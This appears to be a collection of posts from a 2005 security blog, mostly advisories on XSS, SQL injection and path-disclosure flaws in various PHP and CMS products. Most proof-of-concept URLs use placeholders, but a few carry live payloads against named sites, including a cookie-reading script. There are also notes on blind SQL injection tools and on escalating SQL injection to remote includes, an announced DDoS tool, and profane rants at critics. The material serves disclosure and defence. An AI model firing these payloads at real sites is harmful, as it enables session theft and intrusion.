by r0t,der4444,cembo,VietMafia

Saturday, December 31, 2005

BugPort Multiple vuln.


r0t's last vuln. report/advisory of 2005!

Vuln. discovered by : r0t
Date: 31 dec. 2005
vendor:www.incogen.com/index.php?type=General&param=bugport
affected version:v1.147 and prior

Product Description:

The BugPort system is an open-source, freely available, web-based system to manage tasks and defects throughout the software development process. BugPort is written with the PHP language using its object-oriented capabilities and is in use by INCOGEN for internal management of software development and QA.


Vuln. Description:

1.
BugPort contains a flaw that allows remote SQL injection attacks. Input passed to the "orderBy", "where" and "devWherePair[1][0]" parameters in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


/index.php?view=DevelopmentItemResultsView&devWherePair%5B0%5D=state_id+%3C+%3F++AND++MATCH+%28report%2Csubject%2Cdevelplan%2Cfixednotes%2Crepsteps%29+AGAINST+%28%3F++IN+BOOLEAN+MODE%29&devWherePair%5B1%5D%5B0%5D=[SQL]


/index.php?view=DevelopmentItemResultsView&where=project_id+%3D+%3F&orderBy=[SQL]

/index.php?view=DevelopmentItemResultsView&where=[SQL]




2.
BugPort contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to multiple parameters (see POC below) in "index.php" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

/index.php?view=AddToFavoriteItemSetView&ids%5B0%5D=[XSS]

/index.php?view=AddRelatedDevelopmentItemFormView&report_id=9&action=[XSS]

/index.php?view=AddRelatedDevelopmentItemFormView&report_id=[XSS]

/index.php?view=DevelopmentItemResultsView&devWherePair%5B0%5D=state_id+%3C+%3F++AND++MATCH+%28report%2Csubject%2Cdevelplan%2Cfixednotes%2Crepsteps%29+AGAINST+%28%3F++IN+BOOLEAN+MODE%29&devWherePair%5B1%5D%5B0%5D=240&devWherePair%5B1%5D%5B1%5D=[XSS]


/index.php?view=DevelopmentItemResultsView&where=project_id+%3D+%3F&orderBy=priority_id+DESC&binds%5B0%5D=[XSS]



3.

Input passed to the "action" parameter isn't properly sanitised before being returned to the user, which may expose sensitive information about the system configuration and the full installation path.


/index.php?view=AddRelatedDevelopmentItemFormView&report_id=9&action=[CODE]


Solution:
Edit the source code to ensure that input is properly sanitised.
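As an added illustration (this is not BugPort's code and not part of the advisory), the PHP sketch below mirrors the three patterns reported above, and the same reflected-parameter and path-disclosure patterns recur in the other advisories on this page: a client-supplied `where`/`orderBy` SQL fragment concatenated into a query, an `action` value echoed back unescaped, and a PHP warning that leaks the installation path. The hardened handler maps request values onto allowlisted filters and sort columns, binds data values, escapes on output and keeps error details out of the response. All table, column and function names are assumptions.

```php
<?php
// Added example: hypothetical list handler mirroring the BugPort report.
// Table and column names (dev_items, project_id, ...) are assumed.

// Error details go to the log, never to the response, so an unexpected
// parameter value cannot reveal the installation path (advisory item 3).
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// --- Vulnerable shape (what the advisory describes) ----------------------
function listItemsVulnerable(PDO $db, array $get): array
{
    // 'where' and 'orderBy' arrive as raw SQL text from the client and are
    // concatenated straight into the query: SQL injection (item 1).
    $sql = "SELECT id, subject FROM dev_items WHERE " . $get['where']
         . " ORDER BY " . $get['orderBy'];
    $rows = $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);

    // 'action' is echoed back verbatim: reflected XSS (item 2).
    echo "<p>Action: " . $get['action'] . "</p>";
    return $rows;
}

// --- Hardened shape ------------------------------------------------------
const ALLOWED_FILTERS = [
    // filter name chosen by the client => SQL fragment with a placeholder
    'project' => 'project_id = :value',
    'state'   => 'state_id = :value',
];
const ALLOWED_SORT    = ['priority_id', 'created', 'subject'];
const ALLOWED_ACTIONS = ['add', 'edit', 'view'];

function listItemsHardened(PDO $db, array $get): array
{
    // The client names a filter; the SQL text itself never leaves the server.
    $filter = $get['filter'] ?? 'project';
    if (!isset(ALLOWED_FILTERS[$filter])) {
        throw new InvalidArgumentException('unknown filter');
    }
    // Data values are typed and bound, never concatenated.
    $value = filter_var($get['value'] ?? '', FILTER_VALIDATE_INT);
    if ($value === false) {
        throw new InvalidArgumentException('filter value must be an integer');
    }
    // ORDER BY cannot be parameterised, so the column is allowlisted.
    $sort = in_array($get['orderBy'] ?? '', ALLOWED_SORT, true)
          ? $get['orderBy'] : 'priority_id';
    $dir  = (($get['dir'] ?? 'desc') === 'asc') ? 'ASC' : 'DESC';

    $stmt = $db->prepare(
        "SELECT id, subject FROM dev_items WHERE " . ALLOWED_FILTERS[$filter]
        . " ORDER BY $sort $dir"
    );
    $stmt->execute([':value' => $value]);
    $rows = $stmt->fetchAll(PDO::FETCH_ASSOC);

    // Reflected values are allowlisted and HTML-escaped before output.
    $action = in_array($get['action'] ?? '', ALLOWED_ACTIONS, true)
            ? $get['action'] : 'view';
    echo "<p>Action: " . htmlspecialchars($action, ENT_QUOTES, 'UTF-8') . "</p>";
    return $rows;
}
```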

Pridels' statistics

On the last day of the year, looking at the counters at counter.hackers.lv, we see that the undisputed leader, and not only in the last months, has been this blog.

Here are the statistics for the last months:

pridels rules


Those who disagree may say that someone is trash and that the blog is shit, but even in terms of visits alone it beats many popular projects, undoubtedly being Latvia's most visited blog!

In any case, this blog's visitors seem to be security specialists outside Latvia; in any case, even if the blog dies tomorrow, people will still be talking about it for the whole next year. That only confirms that we have achieved what we set out to do and that all of this will have a continuation: one day a forum will appear, maybe a modest site... but the main thing is that the whole atmosphere that reigned here will also remain, even though lately you may have noticed that it has turned more into a bugtraq than a normal blog; but that all goes with the territory, that is the strategy we chose, not a style, and until the forum is back I will publish at least vulnerabilities from various projects.

r0t's vulnerabilities:

About the vulnerabilities: many of the vulnerabilities I published concerned scripts that had never been on bugtraq at all and never would have been, because no demos and no downloads were available to ordinary mortals who won't part with sums above 50,000 or even 100,000$.
And even if I only managed to find some elementary XSS bugs in them, nobody could do that before me.
You'll say, what's so special about that; ok... sit down at a bank's site and let's see how easily you find vulnerabilities, even just XSS.
Some wise guys have said that what I do is a sham, but then why do 3 of the most popular vuln scanner developers turn to me for advice?
If you can do better than me, I'll buy you an ice cream; don't throw words around if you can't do anything yourself!

I'll say in advance that the new site and the forum will be found under the domain r00t.it!

I'll also say in advance that the DDOS tool Alberts will come out sometime in January, when cembo has more time and desire!

Friday, December 30, 2005

Dedicated to all the assholes

Today I again noticed that, you see, somebody doesn't like something here: you see, earlier the blog was still readable, I'm a moron, I can't do anything, etc., and I'd better talk about carding.

So I'll dedicate this post to all the Latvian-speaking assholes who have an itch and can't sit still in their own corner.
Sit in your datuve or set up a new hackers.lv and stay there; nobody here forces you to read anything or to come here.
And in this particular case: loser, if your knowledge were even at an average level you wouldn't crawl in here and stink at all; you can reproach the little boys you poke around in corners with.
If you need warez go to hack.nite, if you care about security go to netsec; what are you looking for here, halva? Go suck your own dick, that'll be your halva.
If you came here to show how cool you are, then feel free to pick another place to stink, and if you're such a capable pastry then go ahead and delete this blog... And I'll even treat you to that ice cream for it.
And about carding, I have nothing to do with it... there are special forums for carding and there they'll tell you about carding.
So next time the idea of showing off your wisdom comes into your head, first go suck yourself, then think about whether you really are cool enough to reproach anyone here.

PS. I'm telling in advance all those punishers who will now suddenly imagine that, you see, they'll be the ones to teach little r0t a lesson for his reply to their stinking: you are all trash. And I don't seek respect from your side; this is my home, and if somebody comes and spits here, they get the same back.
And everything that is done here is not done for myself, but for the people who need it, and nothing will change because of a couple of underdeveloped individuals.
Don't respect me and I won't respect you; spit here and I'll spit in your face...
Sit in your local network and keep twitching; you have nothing to do here, this is a private blog!

+
Wise guys, big net owners, when you express your opinion, could you for once muster the courage, so that I don't always have to talk to anonymous trash!


If anyone didn't get it, I can also repeat myself!

r0t

Kayako SupportSuite multiple vuln.

Vuln. discovered by : r0t
Date: 30 dec. 2005
vendor:http://www.kayako.com/supportsuite.php
affected version: v3.00.26 and prior

Product Description:

Kayako SupportSuite offers true integrated Multi-Channel solution allowing you to manage your emails, online issues, chats, self service and issues received by phone. The entire system has been designed to improve productivity and provide seamless integration between all the available modules. With rich AJAX based interface and unmatched features like IRS, VoIP, ViewShare you can be assured that your client issues are not only handled in a timely but efficient manner.


Vuln. Description:

Kayako SupportSuite contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "nav" parameter in "index.php" and to the "Full Name", "Email", "Subject" and "Registered Email" field parameters in the "register", "submit" and "lostpassword" modules isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


POC:


/index.php?_m=downloads&_a=view&parentcategoryid=3&pcid=1&nav=[XSS]


For the POC, manually enter:
''[XSS]

in

/index.php?_m=core&_a=register

Full Name:
Email:

/index.php?_m=tickets&_a=submit

Full Name:
Email:
Subject:

/index.php?_m=core&_a=lostpassword

Registered Email:


+

An attacker can view the full installation path; this flaw exists because input passed to the "_a", "newsid", "downloaditemid" and "kbarticleid" parameters isn't properly sanitised before being returned to the user.

/index.php?_m=news&_a=[FULL PATH]

/index.php?_m=news&_a=viewnews&newsid=[FULL PATH]

/index.php?_m=downloads&_a=downloadfile&downloaditemid=[FULL PATH]

/index.php?_m=knowledgebase&_a=viewarticle&kbarticleid=[FULL PATH]

Solution:
Edit the source code to ensure that input is properly sanitised.

22C3: Private Investigations by r0t



Today at 22C3 (Private Investigations, the European hackers' conference) I met some of my old friends, "The Cracker" and another one, "-??-", both of whom I know from the crackers' scene. -??- was sitting in one of the corners with his box and showed that he is very busy, as always :) The Cracker said that he is out of cracking and is trying to legalize his life...
That's the nice stuff...
There were and will be some good lectures today, but... many of them are uninteresting for me, like the GSM, Xbox or terrorism stuff..
About anonymity, there was JAP, etc..
I don't think that in meetings like this one must speak about projects like JAP.
The speakers were ok... In the dark room there were lockpickers all the time... I will never understand why one should give so much time to picking a door key lock or a bike key lock...
There were a lot of .net junkies... like a paradise for them.. 24 hours a day chilling with their boxes:)
Bonus stuff: there was a stand for someone who offers SSL stuff; they gave away SSL certificates for free.. isn't it amazing? ... yeah... I don't think that is some bonus..
In one area there were some books about liquid life and communism, nazis, marijuana, LSD and other crazy things... (I suppose to give that area an underground meaning)
Ok, too much criticism of the organization, but anyway I had my fun there... learned?
No, just saw some other views and ways to solve problems and to get success.
Today is the last day and I will not go there, but if you are in Berlin you can take a look.

About my English.. I think you already know.

iPei Guestbook XSS vuln.

Vuln. discovered by : r0t
Date: 30 dec. 2005
vendor:http://www.epistream.com/ipei/
affected version:v1.7 and prior

Product Description:

iPei is a simple but elegant little guestbook. The interface is OS X gui-ish, and it comes with mundane features like password protection, IP view, entry pruning, commenting, Y! smilies, secure posting, and owners may customize some aspects of displays.


Vuln. Description:

iPei Guestbook contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the email field parameter in "/index.php?a=sign" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


Solution:
Edit the source code to ensure that input is properly sanitised.

OoApp Guestbook XSS vuln.

Vuln. discovered by : r0t
Date: 30 dec. 2005
vendor:http://www.ooapp.com/
affected version:2.1 and prior

Product Description:

This is a free php based guestbook for your web site. Easy to setup, no MySQL necessary. Uses a basic flat file. Includes a management area, and a general area where users can sign the guestbook. This version corrects a problem that came up when someone did not enter their email address into the guestbook.

Vuln. Description:

OoApp Guestbook contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "page" parameter in "home.php" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

poc:


/home.php?page=1[XSS]
or
/home.php?do=add_form&page=1[XSS]


Solution:
Edit the source code to ensure that input is properly sanitised.

AdesGuestbook XSS vuln.

Vuln. discovered by : r0t
Date: 30 dec. 2005
vendor:www.adesdesign.net/php/products_adesguestbook.php
affected version:v2.0 and prior


Product Description:

This is a Guestbook which works with PHP and MySql. The Admin Page is a secure page that can be logged in to only by the administrator and includes functions such as deleting the record and modifying the record. Records can be deleted/modified by ID, Email and Date. It is developed with customization in mind, so you can easily change the look of the AdesGuestbook according to your website. It uses one single CSS file for the table colors and text format. By changing this CSS file you can apply your choice of colors easily to the whole Guestbook.

Vuln. Description:

AdesGuestbook contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "totalRows_rsRead" parameter in "read.php" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

poc:


/read.php?pageNum_rsRead=1&totalRows_rsRead=[XSS]


Solution:
Edit the source code to ensure that input is properly sanitised.

Wednesday, December 28, 2005

Happy New Year !!!

The crew and I wish a happy new year to everyone!

----------------------------------------------------

In the last days of 2005, r0t will be at the European hackers' conference, so there will be no vuln. or security reports from r0t in these last days... So, take a break!:)

The other guys will enjoy their holidays around the globe and with family...

New vulns, advisories and board in the year 2006!


With best wishes, r0t, der4444, RaZbh, cembo!!!

Tuesday, December 27, 2005

Sql Injection, take complete advantage

Security/Hack Tip:
If a script stores path information in a DB and that information is later used in include statements, an SQL injection can lead to remote includes. Obvious, but it could easily be overlooked. I just wanted to add that after watching the last video that was posted here.

PHP writers: don't store paths in a DB.

Hackers: if you find an SQL injection, check whether the script does this.
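The pattern behind the tip, as an added PHP example that is not from the post or the videos it links: a query result feeds `include`, so whoever controls the query controls the file that runs. The hardened version binds the id, stores a template key instead of a path, resolves the key against a fixed directory and checks the resolved file stays inside it. Table, column and template names are assumptions.

```php
<?php
// Added example (not from the post): the "path stored in the DB, later
// include()d" pattern described in the tip above. Table and column names
// (pages, template_path, template_key) are assumed for illustration.

// --- Vulnerable shape ----------------------------------------------------
function renderPageVulnerable(PDO $db, string $id): void
{
    // Unparameterised query: whoever controls $id controls which row comes
    // back, and with it the value of template_path...
    $row = $db->query("SELECT template_path FROM pages WHERE id = $id")
              ->fetch(PDO::FETCH_ASSOC);
    // ...so the SQL injection becomes a file include. With allow_url_include
    // enabled that is a remote include; with it disabled, still a local one.
    include $row['template_path'];
}

// --- Hardened shape ------------------------------------------------------
// Store a template *key* in the database, never a filesystem path, and map
// the key to a file in code. A tampered row can then only select one of
// these files.
const TEMPLATES = [
    'article' => 'article.php',
    'gallery' => 'gallery.php',
];

function resolveTemplate(string $key): string
{
    if (!isset(TEMPLATES[$key])) {
        throw new RuntimeException('unknown template key');
    }
    $base = realpath(__DIR__ . '/templates');
    $path = ($base === false) ? false : realpath($base . '/' . TEMPLATES[$key]);
    // Defence in depth: the resolved file must sit below the template dir.
    if ($path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('template outside template directory');
    }
    return $path;
}

function renderPageHardened(PDO $db, string $id): void
{
    // Bound, typed parameter: the id cannot change the shape of the query.
    $stmt = $db->prepare('SELECT template_key FROM pages WHERE id = :id');
    $stmt->execute([':id' => (int) $id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        http_response_code(404);
        return;
    }
    include resolveTemplate($row['template_key']);
}

// In php.ini for the same deployment, so that even a leftover include of a
// DB-supplied value cannot fetch code over the network:
// allow_url_include = Off
```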

Sunday, December 25, 2005

Blind MySQL injection database stressing tool

Hi..

It seems someone wins a fight against a blind MySQL injection, with MySQL
v3 and magic_quotes enabled.. This is the funny video:
http://www.reversing.org/files/beyond_mysql_injection.avi

ed2k://|file|beyond_mysql_injection.avi|18148274|CD388D581A720AF5C5887117D9279A1A|h=UZFXHKMLGBOBP56FAYF2LLFNSQARNKQW|/

There's also another video here:
http://www.unsec.net/download/bsqlbf.avi

The Magic is in the ending part of the video!

The tool ("sqlbftools") is under the "projects" section and a little
article ("Blind MySQL injection and database stressing") is under the
"essays" section in the page: http://www.reversing.org. The msqlbf perl
script is available at http://www.unsec.net/


Ping!


Greetings to Dsr! and 7a69


PS: Dab told me to say nothing about http://unsec.net


--
kanutron (aka Josepmaria Roca)
* mailinglists at kanutron.net
* http://kanutron.net/
---------------------------------------------------------
" opinions are like assholes,
everybody has their own "
- Harry Challahan -

Friday, December 23, 2005

CommonSpot Content Server vuln.

Vuln. discovered by : r0t
Date: 23 dec. 2005
vendor:http://www.paperthin.com/
affected version:4.5 and prior


Product Description:

PaperThin's award-winning technology enables our customers to meet their business objectives. With CommonSpot Content Server, organizations can quickly build and easily maintain dynamic, personalized and sophisticated sites.
CommonSpot scales to meet the Web publishing and content management needs of the most demanding sites, and is used by more than 200 organizations of all sizes worldwide.


Vuln. Description:

CommonSpot Content Server contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "NewWindow" parameter isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

poc:

XSS:
/loader.cfm?url=/[DIRPATH]/[DIRPATH]/email-login-info.cfm&errmsg=No%20user%20account%20was%20found%20for%20that%20email%20address.%20%20Please%20try%20again.&bNewWindow=[XSS]

full path:
/loader.cfm?url=/[DIRPATH]/[DIRPATH]/email-login-info.cfm&errmsg=[CODE]


Solution:
Edit the source code to ensure that input is properly sanitised.

Communiqué 4 XSS vuln.

Vuln. discovered by : r0t
Date: 23 dec. 2005
vendor:www.day.com/site/en/index.html
affected version: 4 and prior

Product Description:

Communiqué 4 is the first native JCR (JSR 170) standard compliant enterprise content management solution available on the market today. Communiqué 4 revolutionizes content management by decoupling the content management application from the underlying repository.
Communiqué 4 offers a comprehensive range of fully integrated content solutions that enables leading companies to address all of their global content challenges with one highly scalable, reliable platform.

Vuln. Description:

Input passed to the "query" parameter when performing a search isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


Solution:
Edit the source code to ensure that input is properly sanitised.

Fatwire UpdateEngine 6.2 multiple XSS vuln.

Vuln. discovered by : r0t
Date: 23 dec. 2005
vendor:http://www.fatwire.com/
affected version:6.2 and prior


Product Description:

UpdateEngine6 is a dynamic content management (DCM) solution to address some of the challenges facing enterprise-class e-business initiatives. Storing content at the field level in the database, allowing for the management of that content through a Web interface, exposing that content to innumerable uses, and publishing static Web pages and dynamic content form the basis of the UpdateEngine6 DCM solution. It enables business users to manage content, shortens installation and implementation time, provides a rich set of Web-based tools and wizards, and easily integrates with legacy systems. Since it is 100% Java, it can integrate with all major application servers, including IBM, BEA, Sun, Oracle and HP, and with all databases. Under an agreement made on May 1, 2002, FatWire announced that it would license Autonomy's advanced technology for its flagship product, UpdateEngine, to deliver a fully integrated categorization and retrieval solution into its content management software.

Vuln. Description:

UpdateEngine contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "FUELAP_TEMPLATENAME", "EMAIL" and "COUNTRYNAME" parameters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


poc:

/UpdateEngine?FUELAP_OP=FUELOP_NewScreen&PAGE_ID=FWS%5FPAGE%5F1399202&FUELAP_SITEDBID=SITE%5F%2D66&ACTIVITY_ID=FWS%5FWHITEPAPERS%5F1404733&COUNTRY_ID=INTSITE%5F1167494&CAMPAIGN_ID=SFCAMPAIGN%5F%2D1&COUNTRYNAME=us&SOURCEPAGE_ID=FWS%5FPAGE%5F1415379&FUELAP_TEMPLATENAME=[XSS]

/UpdateEngine?FUELAP_OP=FUELOP_NewScreen&FUELAP_TEMPLATENAME=fws%5FforgotpasswordForm&SOURCEPAGE_ID=FWS%5FPAGE%5F1150486&PAGE_ID=FWS%5FPAGE%5F1402412&EMAIL=[XSS]&CAMPAIGN_ID=SFCAMPAIGN%5F%2D1&COUNTRY_ID=INTSITE%5F1167494&ERROR=error&ACTIVITY_ID=FWS%5FWHITEPAPERS%5F1300483&COUNTRYNAME=us&FUELAP_SITEDBID=SITE%5F%2D66&

/UpdateEngine?FUELAP_OP=FUELOP_NewScreen&FUELAP_TEMPLATENAME=fws%5FforgotpasswordForm&SOURCEPAGE_ID=FWS%5FPAGE%5F1150486&PAGE_ID=FWS%5FPAGE%5F1402412&EMAIL=&CAMPAIGN_ID=SFCAMPAIGN%5F%2D1&COUNTRY_ID=INTSITE%5F1167494&ERROR=error&ACTIVITY_ID=FWS%5FWHITEPAPERS%5F1300483&COUNTRYNAME=[XSS]

/UpdateEngine?FUELAP_OP=FUELOP_NewScreen&FUELAP_TEMPLATENAME=[XSS]

Solution:
Edit the source code to ensure that input is properly sanitised.

eggblog vuln.

Vuln. discovered by : r0t
Date: 22 dec. 2005
vendor:www.epicdesigns.co.uk/projects/eggblog.php
affected version:eggblog v2.0 and prior


Product Description:

eggblog is a small, simple, secure and open source blogging package. Anyone with a php and mysql enabled server can make use of our easy to install package to create their own personal blog.


Vuln. Description:


1.
eggblog contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to parameters in "home/search.php" when performing a search isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

2.
It is also possible to disclose the full path to "search.php" by accessing it with an invalid "q" parameter.


Solution:
Edit the source code to ensure that input is properly sanitised.

AlstraSoft EPay Enterprise v3.0 XSS vuln.

Vuln. discovered by : r0t
Date: 23 dec. 2005
vendor:www.alstrasoft.com/epay_enterprise.htm
affected version:v3.0 and prior

Product Description:

EPay Enterprise (formerly known as DoPays) has been acquired by AlstraSoft and added into our product line with the growing demand for online payment processing business similar to Paypal and Stormpay.com. The most advanced and comprehensive version of our EPay series on the market at the moment, our Enterprise edition not only allows you to start your own payment processor site; EPay operators can also offer escrow services with our built in EZ-Escrow module, which is great for auction or freelance websites.
EPay Enterprise is the ideal software solution for those who wish to run their own Paypal, Stormpay, or e-gold type of online business. Epay Enterprise comes with a ready out of the box website with all the features you need to run your own payment gateway system at a low price of only $300.


Vuln. Description:

EPay Enterprise contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to parameters in many fields (see below) isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

/enterprise/members/profile.htm
/enterprise/members/card.htm
/enterprise/members/bank.htm
/enterprise/members/subscriptions.htm
/enterprise/members/send.htm
/enterprise/members/request.htm
/enterprise/members/forgot.htm
/enterprise/members/escrow.htm
/enterprise/members/donations.htm
/enterprise/members/products.htm

Solution:
Edit the source code to ensure that input is properly sanitised.

Thursday, December 22, 2005

SECURITY.UZ :)

I always loved those guys who say that they are sec. specialists, and here is one simple example that not everyone who calls themselves a "security specialist" is a real sec. specialist.
Before teaching others, try to educate yourself more; every one of us can make mistakes because we are human, but if you call yourself a security specialist then check your own security first.

http://www.security.uz/search/default.asp?q=%22%3E%3Cscript%3Ealert%28%27r0t%20loves%20security%20guys%20who%20are%20not%20secure%20by%20themselfes%27%29%3C%2Fscript%3E&only=bugtraq



PS. your site can have more bugs; I checked only the simplest.

Yahoo! vuln.

POC:
http://de.mf.news.yahoo.com/mailto?url=http://attackerhost.com/badscript&title=[ATTACKER NICE TEXT TO TARGET]

download.com XSS vuln.

download.com has a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "tg" and "path" parameters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

http://www.download.com/3120-20_4-0.html?tag=srch&qt=r0t&tg=[XSS]

http://music.download.com/1300-1_32-142.html?tag=mhd_su&path=[XSS]

mp3.com XSS vuln.

in da simplest place:)


mp3.com has a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "query" parameter in "search.php" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

live POC:
http://www.mp3.com/search.php?action=Search&stype=artist&query=%3Cscript%3Ealert(document.cookie)%3C/script%3E&x=31&y=16

WebDB SQL inj vuln.

Vuln. discovered by : r0t
Date: 22 dec. 2005
vendor:http://www.loissoftware.com
affected version:1.1 and prior

Product Description:
WebDB is the totally generic, instant online database system - It is possible to create a dynamic web site with no programming knowledge. The software comes with an administration system that allows you to create fields, records, etc. and then decide which fields will appear on the search, results and details pages. You also have total control of the look and feel of the database pages.


Vuln. Description:

WebDB contains a flaw that allows remote SQL injection attacks. Input passed to the search parameter in the search module isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Solution:
Edit the source code to ensure that input is properly sanitised.

WAXTRAPP XSS vuln.

Vuln. discovered by : r0t
Date: 22 dec. 2005
vendor:http://www.waxtrapp.com
affected version:3.0.x, already tested on 3.0.1 and previous versions.

Product Description:

WAXTRAPP is a development platform for fully personalized content distribution, content management, enterprise information portals and online information systems. WAXTRAPP has been active since 1997 as a leading innovator in the internet software industry. With customers like TV networks, industry, e-government and healthcare, WAXTRAPP has proven to be the most scalable and flexible system around and easily integrates with a wide range of external systems. The number one reason people choose WAXTRAPP is because it brings together inter-, intra- and extranet functionality with fully personalized portal functionality, where otherwise such projects would require the purchase of many different software products and expensive IT-projects to let them work together. This enables mid-sized companies to implement cost-saving solutions otherwise only affordable for multinationals.

Vuln. Description:

WAXTRAPP contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module parameters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


Solution:
Edit the source code to ensure that input is properly sanitised.

WANDSOFT e-SEARCH XSS vuln.

Vuln. discovered by : r0t
Date: 22 dec. 2005
vendor:http://www.wandsoft.com/products/
affected version:latest; it is also used as the search module for WANDSOFT e-Suite 4 and prior.

Product Description:

The WANDSOFT e-SEARCH function allows the content of your website, extranet or intranet to be indexed, so users can find a specific word or topic without having to browse the entire site. Any changes to the site content are automatically updated in the site index, so that WANDSOFT e-SEARCH will always include the latest information in the search results.

The WANDSOFT e-SEARCH functionality enables you to provide better customer care and to reduce the possible frustration of your website visitors – even novice users will be able to locate and go directly to the area they seek immediately.

Why Use WANDSOFT e-SEARCH?

As well as the benefits of using any WANDSOFT e-Suite module, the particular benefits of using WANDSOFT e-SEARCH are:

- Your customers will be delighted to quickly locate the information or page they seek
- Website visitors will remember a positive experience, reflecting well on your organisation
- No training is required; once installed, the WANDSOFT e-SEARCH functionality is automatic


Vuln. Description:

WANDSOFT e-SEARCH contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search parameters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


Solution:
Edit the source code to ensure that input is properly sanitised.

Wednesday, December 21, 2005

Merry Christmas!

I wish everyone a Merry Christmas, also on behalf of my comrades-in-arms!
Get properly drunk, smash all the neighbours' windows, etc., in that spirit...
But seriously, I really do wish everyone a Merry Christmas.

Oh yes, dear datuve folks, fix the "topic" parameter, or else one day the little ones will take you down like that.

That's all, everyone go rest now!!!

Text-e XSS vuln.

Vuln. discovered by : r0t
Date: 21 dec. 2005
vendor:http://www.text-e.com/
affected version:1.6.4 and prior

Product Description:

Text-e CMS is a full featured content management solution which dramatically reduces the cost and the complexity associated with creating content-rich applications such as portals, collaborative applications, CRM and others.

Vuln. Description:

Text-e CMS contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module parameters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Solution:
Edit the source code to ensure that input is properly sanitised.

    Tangora™ Portal CMS XSS vuln.

    Tangora™ Portal CMS XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://www.tangora.com/
    affected version:4.0 and prior

    Product Description:

    Tangora™ Portal CMS makes it easy for small and mid-sized companies and organizations to communicate via web.

    All in one solution
    Tangora Portal CMS is modular standard software that enables you to create and manage a wide range of websites on one platform, using one tool.

    Tangora Portal CMS not only gives you the tools to manage practically any number of websites, it is web content management, portal management, application server, integration tools, and usage statistics in one advanced, but easy-to-use, package.




    Vuln. Description:

    SiteSage contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "action" parameter isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    example:

    /page1631.aspx?action=[XSS]
    /page496.aspx?action=[XSS]


    note: for testing, the page number is credited to the search function.

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    SyntaxCMS XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://www.syntaxcms.org/
    affected version:1.2.1 and prior

    Product Description:

    SyntaxCMS simplifies publishing various types of content to a site, facilitates creating and managing arbitrary relationships among content items, automates and accelerates custom development, and encourages reuse of site components with other SyntaxCMS installations. It is built using PHP and MySQL and is licensed under the Common Public License.


    Vuln. Description:

    SiteSage contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "search_query" parameter isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    example:

    /search/?search_query=[XSS]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    SpireMedia CMS SQL inj. vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://www.spiremedia.com/
    affected version:mx7


    Product Description:

